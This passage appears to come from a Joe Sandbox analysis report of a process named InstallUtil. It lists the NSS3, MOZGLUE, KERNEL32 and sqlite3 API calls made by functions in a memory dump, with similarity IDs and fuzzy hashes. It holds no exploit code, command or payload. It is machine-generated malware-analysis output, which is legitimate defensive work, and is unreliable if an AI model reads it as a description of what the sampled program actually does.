                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C79EE65
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79EEA2
                                                                                                                  • free.MOZGLUE(?), ref: 6C79EEBB
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C79EED0
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79EF48
                                                                                                                  • free.MOZGLUE(?), ref: 6C79EF68
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C79EF7D
                                                                                                                  • PK11_DoesMechanism.NSS3(?,?), ref: 6C79EFA4
                                                                                                                  • free.MOZGLUE(?), ref: 6C79EFDA
                                                                                                                  • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C79F055
                                                                                                                  • free.MOZGLUE(?), ref: 6C79F060
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2524771861-0
                                                                                                                  APIs
                                                                                                                  • PK11_SignatureLen.NSS3(?), ref: 6C764D80
                                                                                                                  • PORT_Alloc_Util.NSS3(00000000), ref: 6C764D95
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C764DF2
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C764E2C
                                                                                                                  • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C764E43
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C764E58
                                                                                                                  • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C764E85
                                                                                                                  • DER_Encode_Util.NSS3(?,?,6C8B05A4,00000000), ref: 6C764EA7
                                                                                                                  • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C764F17
                                                                                                                  • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C764F45
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C764F62
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C764F7A
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C764F89
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C764FC8
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2843999940-0
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C7604B7
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C760539
                                                                                                                    • Part of subcall function 6C7B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B1228
                                                                                                                    • Part of subcall function 6C7B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7B1238
                                                                                                                    • Part of subcall function 6C7B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B124B
                                                                                                                    • Part of subcall function 6C7B1200: PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B125D
                                                                                                                    • Part of subcall function 6C7B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7B126F
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7B1280
                                                                                                                    • Part of subcall function 6C7B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7B128E
                                                                                                                    • Part of subcall function 6C7B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7B129A
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7B12A1
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C76054A
                                                                                                                  • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C76056D
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7605CA
                                                                                                                  • DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C7605EA
                                                                                                                  • PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C7605FD
                                                                                                                  • PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C760621
                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6C76063E
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C760668
                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C760697
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7606AC
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7606CC
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7606DA
                                                                                                                    • Part of subcall function 6C75E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C7604DC,?,?), ref: 6C75E6C9
                                                                                                                    • Part of subcall function 6C75E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C7604DC,?,?), ref: 6C75E6D9
                                                                                                                    • Part of subcall function 6C75E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C7604DC,?,?), ref: 6C75E6F4
                                                                                                                    • Part of subcall function 6C75E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7604DC,?), ref: 6C75E703
                                                                                                                    • Part of subcall function 6C75E6B0: CERT_FindCertIssuer.NSS3(?,?,6C7604DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C75E71E
                                                                                                                    • Part of subcall function 6C75F660: PR_EnterMonitor.NSS3(6C76050F,?,00000001,?,?,?), ref: 6C75F6A8
                                                                                                                    • Part of subcall function 6C75F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C75F6C1
                                                                                                                    • Part of subcall function 6C75F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C75F7C8
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2470852775-0
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(6C799582), ref: 6C798F5B
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C798F6A
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C798FC3
                                                                                                                  • PK11_GetIVLength.NSS3(-00000001), ref: 6C798FE0
                                                                                                                  • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C87D820,6C799576), ref: 6C798FF9
                                                                                                                  • DER_GetInteger_Util.NSS3(?), ref: 6C79901D
                                                                                                                  • PORT_ZAlloc_Util.NSS3(?), ref: 6C79903E
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C799062
                                                                                                                  • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C7990A2
                                                                                                                  • PORT_ZAlloc_Util.NSS3(?), ref: 6C7990CA
                                                                                                                  • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C7990F0
                                                                                                                  • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C79912D
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C799136
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C799145
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3626836424-0
                                                                                                                  APIs
                                                                                                                  • calloc.MOZGLUE(00000001,00000020), ref: 6C86C8B9
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C86C8DA
                                                                                                                  • malloc.MOZGLUE(00000001), ref: 6C86C8E4
                                                                                                                  • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C86C8F8
                                                                                                                  • PR_NewLock.NSS3 ref: 6C86C909
                                                                                                                  • PR_NewCondVar.NSS3(00000000), ref: 6C86C918
                                                                                                                  • PR_NewCondVar.NSS3(00000000), ref: 6C86C92A
                                                                                                                    • Part of subcall function 6C740F00: PR_GetPageSize.NSS3(6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F1B
                                                                                                                    • Part of subcall function 6C740F00: PR_NewLogModule.NSS3(clock,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F25
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C86C947
                                                                                                                  Similarity
                                                                                                                  • API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2931242645-0
                                                                                                                  • Opcode ID: 96179b4a4c67bed4568c38bf5d79b3cb5c83f5e3b4430f9e17a437fbbf84adf7
                                                                                                                  • Instruction ID: f2a41c59413c9a0244d7c29fa1fc0aa71a6f23943951741b9f3c567d5f0cbcd7
                                                                                                                  • Opcode Fuzzy Hash: 96179b4a4c67bed4568c38bf5d79b3cb5c83f5e3b4430f9e17a437fbbf84adf7
                                                                                                                  • Instruction Fuzzy Hash: F22184F1A007065BEB206FBA9D0965B76B8AF05258F140939E85BC6E42EB31F514C7E2
                                                                                                                  APIs
                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6C74AF47
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190AB
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190C9
                                                                                                                    • Part of subcall function 6C819090: EnterCriticalSection.KERNEL32 ref: 6C8190E5
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C819116
                                                                                                                    • Part of subcall function 6C819090: LeaveCriticalSection.KERNEL32 ref: 6C81913F
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 6C74AF6D
                                                                                                                  • free.MOZGLUE(?), ref: 6C74AFA4
                                                                                                                  • free.MOZGLUE(?), ref: 6C74AFAA
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C74AFB5
                                                                                                                  • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C74AFF5
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C74B005
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C74B014
                                                                                                                  • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C74B028
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C74B03C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                                  • String ID: %s decr => %d$Unloaded library %s
                                                                                                                  • API String ID: 4015679603-2877805755
                                                                                                                  • Opcode ID: 29c64101f4a4707e2a7e734f320f8dd2f9f86ed14fa45a95741ca1777e465a73
                                                                                                                  • Instruction ID: 67a76a7597c6c5d2c18d5e15a83b9b1de02d9eef947498b1cb245c0dd0c36a3b
                                                                                                                  • Opcode Fuzzy Hash: 29c64101f4a4707e2a7e734f320f8dd2f9f86ed14fa45a95741ca1777e465a73
                                                                                                                  • Instruction Fuzzy Hash: CC3125B4B04102ABEB209F64DE44A1AB7B5EB0632DB18C535E80697F41F332F825C7E5
                                                                                                                  APIs
                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C79781D,00000000,6C78BE2C,?,6C796B1D,?,?,?,?,00000000,00000000,6C79781D), ref: 6C796C40
                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C79781D,?,6C78BE2C,?), ref: 6C796C58
                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C79781D), ref: 6C796C6F
                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C796C84
                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C796C96
                                                                                                                    • Part of subcall function 6C741240: TlsGetValue.KERNEL32(00000040,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741267
                                                                                                                    • Part of subcall function 6C741240: EnterCriticalSection.KERNEL32(?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C74127C
                                                                                                                    • Part of subcall function 6C741240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C741291
                                                                                                                    • Part of subcall function 6C741240: PR_Unlock.NSS3(?,?,?,?,6C74116C,NSPR_LOG_MODULES), ref: 6C7412A0
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C796CAA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                  • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                  • API String ID: 4221828374-3736768024
                                                                                                                  • Opcode ID: d3a0ea9dc0a2f023d73a363ed7a28c7d65989df9c16bd7c878a66093ffeb8b32
                                                                                                                  • Instruction ID: dc08b696c4d6c19232d17367dd14913fb683c51bee29f049f27d197dcca1c5e0
                                                                                                                  • Opcode Fuzzy Hash: d3a0ea9dc0a2f023d73a363ed7a28c7d65989df9c16bd7c878a66093ffeb8b32
                                                                                                                  • Instruction Fuzzy Hash: B701A2A170231137FA6027BD7F4AF66295C9F8315CF144931FE04E0A82EB92E624C1E5
                                                                                                                  APIs
                                                                                                                  • PR_SetErrorText.NSS3(00000000,00000000,?,6C7678F8), ref: 6C7A4E6D
                                                                                                                    • Part of subcall function 6C7409E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C7406A2,00000000,?), ref: 6C7409F8
                                                                                                                    • Part of subcall function 6C7409E0: malloc.MOZGLUE(0000001F), ref: 6C740A18
                                                                                                                    • Part of subcall function 6C7409E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C740A33
                                                                                                                  • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C7678F8), ref: 6C7A4ED9
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C797703,?,00000000,00000000), ref: 6C795942
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C797703), ref: 6C795954
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C79596A
                                                                                                                    • Part of subcall function 6C795920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C795984
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C795999
                                                                                                                    • Part of subcall function 6C795920: free.MOZGLUE(00000000), ref: 6C7959BA
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C7959D3
                                                                                                                    • Part of subcall function 6C795920: free.MOZGLUE(00000000), ref: 6C7959F5
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C795A0A
                                                                                                                    • Part of subcall function 6C795920: free.MOZGLUE(00000000), ref: 6C795A2E
                                                                                                                    • Part of subcall function 6C795920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C795A43
                                                                                                                  • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4EB3
                                                                                                                    • Part of subcall function 6C7A4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A4EB8,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A484C
                                                                                                                    • Part of subcall function 6C7A4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C7A4EB8,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A486D
                                                                                                                    • Part of subcall function 6C7A4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C7A4EB8,?), ref: 6C7A4884
                                                                                                                  • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4EC0
                                                                                                                    • Part of subcall function 6C7A4470: TlsGetValue.KERNEL32(00000000,?,6C767296,00000000), ref: 6C7A4487
                                                                                                                    • Part of subcall function 6C7A4470: EnterCriticalSection.KERNEL32(?,?,?,6C767296,00000000), ref: 6C7A44A0
                                                                                                                    • Part of subcall function 6C7A4470: PR_Unlock.NSS3(?,?,?,?,6C767296,00000000), ref: 6C7A44BB
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F16
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F2E
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F40
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F6C
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F80
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A4F8F
                                                                                                                  • PK11_UpdateSlotAttribute.NSS3(?,6C87DCB0,00000000), ref: 6C7A4FFE
                                                                                                                  • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C7A501F
                                                                                                                  • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C7678F8), ref: 6C7A506B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 560490210-0
                                                                                                                  • Opcode ID: 20f447fb86ec3967b970c8705e89d73714af9993b522e0789ae2da621cc0affc
                                                                                                                  • Instruction ID: 2be2302cd84491b113fe33e1f5e51ae99acb44d41e6936baa923ca04c1e55312
                                                                                                                  • Opcode Fuzzy Hash: 20f447fb86ec3967b970c8705e89d73714af9993b522e0789ae2da621cc0affc
                                                                                                                  • Instruction Fuzzy Hash: 6D51F3B19006019BEB119FB5EE09AAB77B4FF0535CF184735E80686B12FB32D516CAD2
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 786543732-0
                                                                                                                  • Opcode ID: 03524c9c0395163d74752f7b284b4260fc5699e9aefe261d749a2087148757c3
                                                                                                                  • Instruction ID: d6c5200bf8d7cf211c2d63efeb6d091962441636236140a21e8f2ea496e38f93
                                                                                                                  • Opcode Fuzzy Hash: 03524c9c0395163d74752f7b284b4260fc5699e9aefe261d749a2087148757c3
                                                                                                                  • Instruction Fuzzy Hash: 5451C1B0E011269BDF20DF98DE46AAE77B8BB0635CF148035D814A7B01E331AD15CBD6
                                                                                                                  APIs
                                                                                                                  • sqlite3_value_text16.NSS3(?), ref: 6C824CAF
                                                                                                                  • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C824CFD
                                                                                                                  • sqlite3_value_text16.NSS3(?), ref: 6C824D44
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                  • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                  • API String ID: 2274617401-4033235608
                                                                                                                  • Opcode ID: 4c3344b4fc1c258b55ef70d71ccd82974bd1537655ed28c5a58da0a6827eb0c6
                                                                                                                  • Instruction ID: ad20abff1f36f0aaa3ffff1d59f7fd6ea86fefcdc0ff09b41f8f5bcc703559c0
                                                                                                                  • Opcode Fuzzy Hash: 4c3344b4fc1c258b55ef70d71ccd82974bd1537655ed28c5a58da0a6827eb0c6
                                                                                                                  • Instruction Fuzzy Hash: 6C3177B2A09815A7E7384A28AB0C7A47721B7C2319F560D36C8244BF55C7BCACD5C7F2
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F24BA
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F250D
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F2554
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F25A7
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F2609
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F265F
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F26A2
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F26F5
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F2764
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F2898
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F28D0
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6F2948
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6F299B
